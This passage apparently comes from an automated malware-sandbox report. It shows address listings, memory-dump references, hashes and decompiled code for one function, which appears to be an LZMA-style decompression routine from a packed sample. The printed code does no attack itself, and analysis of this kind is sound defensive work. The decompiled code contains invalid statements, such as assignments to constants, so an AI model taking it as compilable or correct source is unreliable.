                                                              0x00406b2b
                                                              0x00406b2e
                                                              0x00406b31
                                                              0x00406b33
                                                              0x00406b33
                                                              0x00406b33
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f12
                                                              0x00406f12
                                                              0x00406f12
                                                              0x00406f16
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f1c
                                                              0x00406f1f
                                                              0x00406f22
                                                              0x00406f25
                                                              0x00406f27
                                                              0x00406f27
                                                              0x00406f27
                                                              0x00406f2a
                                                              0x00406f2d
                                                              0x00406f30
                                                              0x00406f33
                                                              0x00406f36
                                                              0x00406f39
                                                              0x00406f3a
                                                              0x00406f3c
                                                              0x00406f3c
                                                              0x00406f3c
                                                              0x00406f3f
                                                              0x00406f42
                                                              0x00406f45
                                                              0x00406f48
                                                              0x00406f4b
                                                              0x00406f4f
                                                              0x00406f51
                                                              0x00406f54
                                                              0x00000000
                                                              0x00406f56
                                                              0x00000000
                                                              0x00406f56
                                                              0x00406f54
                                                              0x00407189
                                                              0x00000000
                                                              0x00000000
                                                              0x004067b8

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b03ad86bf6e5db825a161e7c2c9863a2c6e055a2fa0602cea3b48f6a3cf4a0c0
                                                              • Instruction ID: 7a557209975026f945a3d96698a9d3e809275b90a73cce2131b371529b247a98
                                                              • Opcode Fuzzy Hash: b03ad86bf6e5db825a161e7c2c9863a2c6e055a2fa0602cea3b48f6a3cf4a0c0
                                                              • Instruction Fuzzy Hash: 0F813471D04228CFDF24CFA8C884BADBBB1FB44305F25816AD456BB281C778A996DF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00406776, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 98%
                                                              			E00406776(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004071C8))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                              0x00406786
                                                              0x0040678d
                                                              0x00406793
                                                              0x00406799
                                                              0x00000000
                                                              0x0040679d
                                                              0x004067a9
                                                              0x004067a9
                                                              0x004067a9
                                                              0x004067b2
                                                              0x00000000
                                                              0x00000000
                                                              0x004067b8
                                                              0x00000000
                                                              0x004067bf
                                                              0x004067c3
                                                              0x00000000
                                                              0x00000000
                                                              0x004067cc
                                                              0x004067cf
                                                              0x004067d2
                                                              0x004067d4
                                                              0x004067d6
                                                              0x00000000
                                                              0x00000000
                                                              0x004067dc
                                                              0x004067df
                                                              0x004067e1
                                                              0x004067e2
                                                              0x004067e5
                                                              0x004067e7
                                                              0x004067e8
                                                              0x004067ea
                                                              0x004067ed
                                                              0x004067f2
                                                              0x004067f7
                                                              0x00406800
                                                              0x00406813
                                                              0x00406816
                                                              0x0040681f
                                                              0x00406822
                                                              0x0040684a
                                                              0x0040684a
                                                              0x0040684c
                                                              0x0040685a
                                                              0x0040685a
                                                              0x0040685e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040684e
                                                              0x0040684e
                                                              0x00406851
                                                              0x00406851
                                                              0x00406852
                                                              0x00406852
                                                              0x00000000
                                                              0x0040684e
                                                              0x00406824
                                                              0x00406828
                                                              0x0040682d
                                                              0x0040682d
                                                              0x00406836
                                                              0x0040683c
                                                              0x0040683e
                                                              0x00406841
                                                              0x00000000
                                                              0x00406847
                                                              0x00406847
                                                              0x00000000
                                                              0x00406847
                                                              0x00000000
                                                              0x00406864
                                                              0x00406864
                                                              0x00406868
                                                              0x00407114
                                                              0x00000000
                                                              0x00407114
                                                              0x00406871
                                                              0x00406881
                                                              0x00406884
                                                              0x00406887
                                                              0x00406887
                                                              0x00406887
                                                              0x0040688a
                                                              0x0040688a
                                                              0x0040688e
                                                              0x00000000
                                                              0x00000000
                                                              0x00406890
                                                              0x00406893
                                                              0x00406896
                                                              0x004068c0
                                                              0x004068c6
                                                              0x004068cd
                                                              0x00000000
                                                              0x004068cd
                                                              0x00406898
                                                              0x0040689c
                                                              0x0040689f
                                                              0x004068a4
                                                              0x004068a4
                                                              0x004068af
                                                              0x004068b5
                                                              0x004068b7
                                                              0x004068ba
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004068ff
                                                              0x00406905
                                                              0x00406908
                                                              0x00406915
                                                              0x0040691d
                                                              0x00000000
                                                              0x00000000
                                                              0x004068d4
                                                              0x004068d4
                                                              0x004068d8
                                                              0x00407123
                                                              0x00000000
                                                              0x00407123
                                                              0x004068e4
                                                              0x004068ef
                                                              0x004068ef
                                                              0x004068ef
                                                              0x004068f2
                                                              0x004068f5
                                                              0x004068f8
                                                              0x004068fb
                                                              0x004068fd
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f9a
                                                              0x00406fa0
                                                              0x00406fa3
                                                              0x00406fa6
                                                              0x00406fc0
